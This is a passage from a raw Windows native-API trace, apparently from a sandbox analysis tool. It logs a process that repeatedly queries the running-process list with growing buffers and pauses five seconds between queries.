SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.291] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.298] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.305] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.311] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.318] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.321] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.326] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.333] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.348] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.355] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.365] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.373] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.384] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.392] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.400] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.406] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.413] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.421] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.427] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.435] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.445] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.451] 